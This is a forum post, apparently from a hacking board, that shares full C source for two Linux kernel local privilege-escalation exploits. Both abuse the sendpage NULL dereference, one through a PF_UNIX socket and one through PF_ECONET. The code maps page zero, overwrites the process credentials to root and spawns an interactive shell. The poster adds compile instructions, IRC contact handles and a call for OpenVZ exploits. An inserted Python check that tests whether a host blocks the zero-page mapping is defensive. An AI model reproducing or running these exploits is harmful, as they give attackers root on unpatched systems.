    unsigned long sp;
    asm volatile ("movq %%rsp,%0; " : "=r" (sp));
    return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movl %%esp,%0" : "=r" (sp));
    return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("mr %0,%%r1; " : "=r" (sp));
    return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct;
    asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
    return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
    thread_info = current_stack_pointer() & ~(4096 - 1);
    if (*(unsigned long *)thread_info >= 0xc0000000) {
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    }
    task_struct = current_stack_pointer() & ~(8192 - 1);
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0

static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
#if defined(__LP64__)
    task_struct = current_stack_pointer() & ~(16384 - 1);
#else
    task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (task_struct[0] == uid && task_struct[1] == uid && task_struct[2] == uid && task_struct[3] == uid &&
    task_struct[4] == gid && task_struct[5] == gid && task_struct[6] == gid && task_struct[7] == gid) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (!task_struct[0]) {
    task_struct++;
    continue;
    }
    if (task_struct[0] == task_struct[1] && task_struct[0] == task_struct[2] && task_struct[0] == task_struct[3] &&
    task_struct[4] == task_struct[5] && task_struct[4] == task_struct[6] && task_struct[4] == task_struct[7]) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#endif
#define PAGE_SIZE getpagesize()

int main(void) {
    char *addr;
    int out_fd, in_fd;
    char template[] = "/tmp/tmp.XX";
#if defined(__i386__) || defined(__x86_64__)
    uid = getuid(), gid = getgid();
#endif
    if ((addr=mmap(0x0,PAGE_SIZE,PROT_EXEC|PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED) {
    perror("- mmap failed");
    exit(EXIT_FAILURE);
    }
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
    addr[0] = '\xff';
    addr[1] = '\x24';
    addr[2] = '\x25';
    *(unsigned long *)&addr[3] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
    addr[0] = '\xff';
    addr[1] = '\x25';
    *(unsigned long *)&addr[2] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
    addr[0] = '\x3f';
    addr[1] = '\xe0';
    *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
    addr[4] = '\x63';
    addr[5] = '\xff';
    *(unsigned short *)&addr[6] = (unsigned short)change_cred;
    addr[8] = '\x7f';
    addr[9] = '\xe9';
    addr[10] = '\x03';
    addr[11] = '\xa6';
    addr[12] = '\x4e';
    addr[13] = '\x80';
    addr[14] = '\x04';
    addr[15] = '\x20';
#endif
#endif
    if ((out_fd = socket(PF_UNIX, SOCK_DGRAM, 0)) == -1) {
    perror("- socket");
    exit(EXIT_FAILURE);
    }
    if ((in_fd = mkstemp(template)) == -1) {
    perror("- mkstemp");
    exit(EXIT_FAILURE);
    }
    if(unlink(template) == -1) {
    perror("- unlink");
    exit(EXIT_FAILURE);
    }
    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
    perror("- ftruncate");
    exit(EXIT_FAILURE);
    }
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
    execl("/bin/sh", "sh", "-i", NULL);
    exit(EXIT_SUCCESS);
}

NOTE: that can be added to BSD easily...

Finally, the Econet one, which usually fails but has worked on a few *select* 2011 (very nice) kernels.. and is proven.

/* PF_ECONET sendpage-raw local root exploit 2011
 * For i386 & ppc compile with the command;
 * gcc -w -o exploit exploit.c
 *
 * For x86_64 kernel and ppc64 Compile as;
 * gcc -w -m64 -o exploit exploit.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movq %%rsp,%0; " : "=r" (sp));
    return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movl %%esp,%0" : "=r" (sp));
    return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("mr %0,%%r1; " : "=r" (sp));
    return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct;
    asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
    return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
    thread_info = current_stack_pointer() & ~(4096 - 1);
    if (*(unsigned long *)thread_info >= 0xc0000000) {
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    }
    task_struct = current_stack_pointer() & ~(8192 - 1);
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
#if defined(__LP64__)
    task_struct = current_stack_pointer() & ~(16384 - 1);
#else
    task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (task_struct[0] == uid && task_struct[1] == uid && task_struct[2] == uid && task_struct[3] == uid &&
    task_struct[4] == gid && task_struct[5] == gid && task_struct[6] == gid && task_struct[7] == gid) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (!task_struct[0]) {
    task_struct++;
    continue;
    }
    if (task_struct[0] == task_struct[1] && task_struct[0] == task_struct[2] && task_struct[0] == task_struct[3] &&
    task_struct[4] == task_struct[5] && task_struct[4] == task_struct[6] && task_struct[4] == task_struct[7]) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#endif
#define PAGE_SIZE getpagesize() // want 2011, then use this or 4096!

int main(void) {
    char *addr;
    int out_fd, in_fd;
    char template[] = "/tmp/tmp.XX";
#if defined(__i386__) || defined(__x86_64__)
    uid = getuid(), gid = getgid();
#endif
    if ((addr=mmap(0x0,PAGE_SIZE,PROT_EXEC|PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED) {
    perror("- mmap failed");
    exit(EXIT_FAILURE);
    }
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
    addr[0] = '\xff';
    addr[1] = '\x24';
    addr[2] = '\x25';
    *(unsigned long *)&addr[3] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
    addr[0] = '\xff';
    addr[1] = '\x25';
    *(unsigned long *)&addr[2] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
    addr[0] = '\x3f';
    addr[1] = '\xe0';
    *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
    addr[4] = '\x63';
    addr[5] = '\xff';
    *(unsigned short *)&addr[6] = (unsigned short)change_cred;
    addr[8] = '\x7f';
    addr[9] = '\xe9';
    addr[10] = '\x03';
    addr[11] = '\xa6';
    addr[12] = '\x4e';
    addr[13] = '\x80';
    addr[14] = '\x04';
    addr[15] = '\x20';
#endif
#endif
    if ((out_fd = socket(PF_ECONET,SOCK_RAW,0)) == -1) { //my baby
    perror("- socket");
    exit(EXIT_FAILURE);
    }
    if ((in_fd = mkstemp(template)) == -1) {
    perror("- mkstemp");
    exit(EXIT_FAILURE);
    }
    if(unlink(template) == -1) {
    perror("- unlink");
    exit(EXIT_FAILURE);
    }
    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
    perror("- ftruncate");
    exit(EXIT_FAILURE);
    }
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
    execl("/bin/sh", "sh", "-i", NULL);
    exit(EXIT_SUCCESS);
}
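All three exploits above begin with `mmap(0x0, PAGE_SIZE, ..., MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, ...)` so that the kernel's NULL function-pointer call through the missing sendpage handler lands on `change_cred`; the `vm.mmap_min_addr` sysctl makes that first step fail unless the caller holds CAP_SYS_RAWIO. The check below is an added example (not the post's code) that a defender runs to confirm a Linux host refuses the mapping: it reads the sysctl, looks for CAP_SYS_RAWIO in the effective capability set, and attempts the same fixed mapping through libc via ctypes. `MAP_FIXED = 0x10` and `CAP_SYS_RAWIO = 17` are the Linux values; the probe is Linux-specific.

```python
"""Probe whether this host still allows the zero-page mapping the sendpage
exploits rely on.  Added example (not the post's code); Linux-specific."""
import ctypes
import ctypes.util
import mmap

MAP_FIXED = 0x10            # Linux value; Python's mmap module does not export it
CAP_SYS_RAWIO = 17          # bit index in CapEff (linux/capability.h)
PTR_BITS = 8 * ctypes.sizeof(ctypes.c_void_p)
MAP_FAILED = (1 << PTR_BITS) - 1   # (void *)-1 as ctypes hands it back


def read_mmap_min_addr(path="/proc/sys/vm/mmap_min_addr"):
    """Lowest address an unprivileged mmap() may use; -1 if unreadable."""
    try:
        with open(path) as fh:
            return int(fh.read().strip())
    except (OSError, ValueError):
        return -1


def has_cap_sys_rawio(path="/proc/self/status"):
    """True if CAP_SYS_RAWIO is in this process's effective capability set,
    the one capability that lets mmap() go below vm.mmap_min_addr."""
    try:
        with open(path) as fh:
            for line in fh:
                if line.startswith("CapEff:"):
                    return bool((int(line.split()[1], 16) >> CAP_SYS_RAWIO) & 1)
    except (OSError, ValueError, IndexError):
        pass
    return False


def null_page_mappable():
    """Attempt the exploits' first step: a fixed anonymous RW mapping at 0.

    Returns (granted, errno).  A hardened kernel refuses with EPERM; if the
    mapping is granted it is torn down immediately.
    """
    libc = ctypes.CDLL(ctypes.util.find_library("c") or "libc.so.6", use_errno=True)
    libc.mmap.restype = ctypes.c_void_p
    libc.mmap.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int,
                          ctypes.c_int, ctypes.c_int, ctypes.c_long]
    libc.munmap.argtypes = [ctypes.c_void_p, ctypes.c_size_t]
    flags = mmap.MAP_PRIVATE | mmap.MAP_ANONYMOUS | MAP_FIXED
    ret = libc.mmap(0, mmap.PAGESIZE, mmap.PROT_READ | mmap.PROT_WRITE, flags, -1, 0)
    if ret == MAP_FAILED:
        return False, ctypes.get_errno()
    # ctypes returns None for a NULL pointer, which here means "mapped at 0"
    libc.munmap(0, mmap.PAGESIZE)
    return True, 0


def assess():
    """Report the three signals and a one-line verdict."""
    granted, err = null_page_mappable()
    report = {
        "mmap_min_addr": read_mmap_min_addr(),
        "cap_sys_rawio": has_cap_sys_rawio(),
        "null_page_mapped": granted,
        "mmap_errno": err,
    }
    report["verdict"] = ("EXPOSED: fixed mapping at address 0 was granted" if granted
                         else "OK: kernel refused the zero-page mapping")
    return report


if __name__ == "__main__":
    for key, value in assess().items():
        print(f"{key}: {value}")
```

A `null_page_mapped` of True with a non-zero `mmap_min_addr` means the process holds CAP_SYS_RAWIO, so the check is only meaningful when run as the unprivileged user the exploits would run as.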

Again, enjoy the *right*-made stuff; not taking credit for it, but definitely fixing some things and adjusting some releases which now seem to be mostly forkbombs... I dislike that. Either release your privates, which may be OK for even ONE kernel, as I am for sure after an OpenVZ kernel-local, and some kind of OpenVZ attacker in general.. if interested, email me here/PM whatever.
I can be found on EFnet as xd-- / #haxnet or on Undernet as xds in the #zombie channel
I look forward to any new things; at the moment I can safely say that up to 2010 I have covered in ONE neat setup of only 4 exploits.. which is OK.
So, I am trying to make a perfect BSD-Linux-x86_64-OpenVZ payload-style scanner; any influence is welcome..

Note: I notice this site has HUGE ranks, so if your stuff got here, you're damn lucky buddy!
xd